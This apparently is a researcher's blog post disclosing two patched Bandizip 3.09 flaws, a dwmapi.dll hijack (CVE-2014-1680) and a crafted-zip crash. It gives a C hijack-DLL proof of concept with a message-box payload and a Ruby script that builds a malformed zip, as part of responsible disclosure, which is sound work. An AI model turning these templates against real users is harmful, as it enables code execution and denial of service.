Bandizip Multiple Vulnerabilities

All these issues are patched in Bandizip 3.10 after a responsible disclosure done to the vendor.

Overview of Bandizip

Bandizip is a Lightweight, Fast and 100% free All-In-One Zip Archiver. It has a very fast Zip algorithm for compression & extraction with Fast Drag and Drop, High Speed Archiving, and Multi-core compression. It handles the most popular compression formats, including Zip, 7z, Rar, and so on.

Arbitrary DLL Injection Code Execution

Bandizip 3.09 and below version are affected with a DLL hijacking issue in which the application loads dwmapi.dll in an insecure manner.  This can be exploited to load arbitrary libraries by tricking a user into e.g. opening a file located on a remote WebDAV or SMB share. 1 You can clearly see dwmapi.dll is being searched by the application in the current directory as a result of loading it in an insecure manner.

Proof of Concept

/*
* Exploit Title: Bandizip 3.09 DLL Hijacking Exploit (dwmapi.dll)
* Date: February 5th 2014
* Author: Osanda Malith Jayathissa
* E-Mail: osandajayathissagmail.com
* Version: 3.09
* Vendor Homepage: http://www.bandisoft.com/
* Tested on: Windows XP SP2 en
* Vulnerable extensions: All Extensions
* CVE: CVE-2014-1680
*/

#include <windows.h>

BOOL WINAPI DllMain (
HANDLE hinstDLL,
DWORD fdwReason,
LPVOID lpvReserved)
{
switch (fdwReason)
{
case DLL_PROCESS_ATTACH:
owned();
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}

int owned() {
MessageBox(0, "Bandizip DLL Hijacked\nOsanda Malith", "POC", MB_OK);
}

Vulnerability Information

Class: DLL Hijacking [CWE-427]
Impact: System access
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2014-1680

Advisories

[1] http://www.bandisoft.com/bandizip/history/
[2] http://secunia.com/advisories/56846/
[3] http://www.osvdb.org/show/osvdb/102979
[4] http://packetstormsecurity.com/files/cve/CVE-2014-1680

Report Timeline

2014-01-19: Contacted the Vendor
2014-01-23: Issue fixed and acknowledged.
2014-01-24: Bandizip 3.10 Released
2014-01-25: Contacted MITRE and obtained a CVE-ID

.Zip Crash

I also found out that Bandizip 3.09 and below versions are affected with a file format crash in which attackers can crash the application remotely. dos

Proof of Concept

#!/usr/bin/env ruby
# Exploit Title: Bandizip 3.09 .zip Crash POC
# Date: February 6th 2014
# Author: Osanda Malith Jayathissa
# E-Mail: osandajayathissa<at>gmail.com
# Version: 3.09
# Vendor Homepage: http://www.bandisoft.com/
# Tested on: Windows XP SP2 en

=begin
eax=00000000 ebx=0374fad0 ecx=00000000 edx=00000000 esi=0374fa54 edi=00000000
eip=770be1a4 esp=0374f92c ebp=0374faac iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
ntdll!ZwWaitForMultipleObjects+0xc:
770be1a4 c21400          ret     14h
=end

# Ensure we have valid ZIP Header
lf_header =  "\x50\x4B\x03\x04\x14\x00\x00" 
lf_header += "\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"
lf_header += "\x00\x00\x00\x00\x00\x00\x00\x00"
lf_header += "\xe4\x0f" #file size
lf_header += "\x00\x00\x00"

cdf_header =  "\x50\x4B\x01\x02\x14\x00\x14" 
cdf_header += "\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" 
cdf_header += "\x00\x00\x00\x00\x00\x00\x00\x00\x00"
cdf_header += "\xe4\x0f" # file size
cdf_header += "\x00\x00\x00\x00\x00\x00\x01\x00" 
cdf_header += "\x24\x00\x00\x00\x00\x00\x00\x00"

eofcdf_header = "\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00"
eofcdf_header += "\x12\x10\x00\x00" # Size of central directory (bytes)
eofcdf_header += "\x02\x10\x00\x00" # Offset of start of central directory,relative to start of archive
eofcdf_header += "\x00\x00"

# Our Payload
payload = "A" * 4064
payload += ".txt"

Exploit = lf_header + payload + cdf_header + payload + eofcdf_header

f=File.open('bandizip.zip', 'w')
f.write(Exploit)
f.close
#EOF

Report Timeline

2014-01-19: Contacted the Vendor
2014-01-23: Issue fixed and acknowledged.
2014-01-24: Bandizip 3.10 Released

Acknowledgements

As a result of reporting these vulnerabilities my name got published in the About dialog box in Bandizip 3.10 . Cap 2014-01-23 18-26-12-511Thanks to park for adding me 🙂

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s